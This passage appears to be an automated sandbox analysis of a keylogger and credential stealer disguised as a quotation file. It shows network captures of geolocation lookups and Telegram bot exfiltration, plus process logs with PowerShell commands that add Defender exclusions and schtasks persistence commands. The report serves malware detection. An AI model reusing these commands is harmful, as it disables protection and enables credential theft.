<Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49734	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:15 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 08:33:15 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:15 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55504 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DOa8OBDi3Xs1d8F8iqIsb%2FeAI6txjY4h4X71oaTK3fZigrZa3g1F3c0IwimjzgzXDBfygcMZhXhwLn8EdikwJM0SXJYk4%2BtJ8%2FQAI%2FI3vDYZMMMJ4YWFYkuX7eZ8hsef9vmIgDSg"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e571816aeb9428e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1670&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1692753&cwnd=222&unsent_bytes=0&cid=a11f3d3102fd6d24&ts=141&x=0"
2024-11-20 08:33:15 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49735	188.114.96.3	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:15 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 08:33:15 UTC	860	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:15 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55504 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a9a6ilbU0%2F3r3c5vlsatX0YRuCOWV4JWx1QlVBBJMpxEzWO%2BkCJbt0eHf6%2ByutohxpXfDw9q6gNoOIJ4qHqh9jbXnqpNqkIX%2Ft%2FK0tFo%2FIMleYs6%2F5BrtuG5Ab6Ob9R8Rr%2BQUDvj"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5718196e351835-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1529&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1902280&cwnd=126&unsent_bytes=0&cid=c3af681d131cf5c5&ts=173&x=0"
2024-11-20 08:33:15 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49738	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:16 UTC	84	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-11-20 08:33:16 UTC	852	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:16 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55505 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=spIzaFHBA2180di%2FueIZmEYQPA0oJoRqmdgA3DnC5%2BphndBku1PfMjzd6BxTXbBCvnw9C3NrddIhxp7%2FDYvbvWx%2FVXstyM2NLrs9NZ0NNKuW9TDpdVfcOdnSHNUzJu1ZlTZJfUSK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57181e6f32433e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1571&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1812538&cwnd=248&unsent_bytes=0&cid=14d0847f30fd2950&ts=165&x=0"
2024-11-20 08:33:16 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49737	149.154.167.220	443	5268	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:16 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2015:28:21%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-20 08:33:16 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 20 Nov 2024 08:33:16 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-20 08:33:16 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	49740	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:17 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 08:33:17 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:17 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55506 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pR73j%2FPCbTQw5CW%2BrIFZVcTfLN%2BQ1ka2%2FMhqIBu1KKYCO3zWEKexnqsND58CmTMLmmSaG9aCYOOvxXgEm3h%2B%2FaaSbchWy2fsf7JweUtVTunehfDIVxkwx4pjsHSN3pKLUwarzFAU"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e571825de934277-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2486&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1161957&cwnd=191&unsent_bytes=0&cid=c44f5daa9c0c48c6&ts=138&x=0"
2024-11-20 08:33:17 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	49745	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:18 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 08:33:19 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:19 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55508 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BP%2BpmpbYEhJsW1tOBbNe67VhAFflxEYnkH6vsyu23gghXSpR%2FWe0mI3vsRLeI76Ylzw2%2FYGoCkCgQhOluPL1%2BSNn8JXInq8Ikm7MqISNkMzrHZXcBWuUJ8u4%2BFD7BJ0DzwchWjqq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e57182e4f79c359-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1681&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1711606&cwnd=232&unsent_bytes=0&cid=142f9f3a0feab12b&ts=267&x=0"
2024-11-20 08:33:19 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	49760	188.114.96.3	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:20 UTC	60	OUT	GET /xml/8.46.123.75 HTTP/1.1 Host: reallyfreegeoip.org
2024-11-20 08:33:20 UTC	856	IN	HTTP/1.1 200 OK Date: Wed, 20 Nov 2024 08:33:20 GMT Content-Type: text/xml Content-Length: 361 Connection: close Cache-Control: max-age=31536000 CF-Cache-Status: HIT Age: 55509 Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8HsxUXqwoP%2FS1WGQo%2BG1MXuMM8rXcqa9lZuzSk66XKbGS8AumnEHtu5AsTFMiBtFJALUntJT0w4%2FKoTGSYq3%2FzmgmQ%2BrXuItv%2F3nNsjmQk3NjWEWQTccY9De4EWDADjUnH7aTKp2"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e5718367d6072b9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1970&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1442687&cwnd=241&unsent_bytes=0&cid=61caa62a70c540dd&ts=251&x=0"
2024-11-20 08:33:20 UTC	361	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.5	49767	149.154.167.220	443	6448	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-20 08:33:21 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:045012%0D%0ADate%20and%20Time:%2020/11/2024%20/%2014:58:41%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20045012%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-11-20 08:33:21 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Wed, 20 Nov 2024 08:33:21 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-11-20 08:33:21 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	03:32:59
Start date:	20/11/2024
Path:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Imagebase:	0x5d0000
File size:	787'968 bytes
MD5 hash:	7B5985233FAF11890E9CF4C7B579983B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2115396182.0000000003A59000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	03:33:02
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Imagebase:	0xbe0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	03:33:02
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	03:33:02
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Imagebase:	0xbe0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	03:33:02
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	03:33:02
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp"
Imagebase:	0x580000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	03:33:02
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	03:33:02
Start date:	20/11/2024
Path:	C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe"
Imagebase:	0xaa0000
File size:	787'968 bytes
MD5 hash:	7B5985233FAF11890E9CF4C7B579983B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	03:33:04
Start date:	20/11/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	03:33:05
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
Imagebase:	0x1f0000
File size:	787'968 bytes
MD5 hash:	7B5985233FAF11890E9CF4C7B579983B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 34%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	03:33:07
Start date:	20/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp"
Imagebase:	0x580000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	03:33:07
Start date:	20/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	03:33:07
Start date:	20/11/2024
Path:	C:\Users\user\AppData\Roaming\jnqeRRexnD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\jnqeRRexnD.exe"
Imagebase:	0xd30000
File size:	787'968 bytes
MD5 hash:	7B5985233FAF11890E9CF4C7B579983B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.4517414324.0000000003198000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	11.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	175
Total number of Limit Nodes:	14

Executed Functions

Function 06C5CF90 Relevance: .4, Instructions: 405COMMON

Download Yara Rule

Memory Dump Source

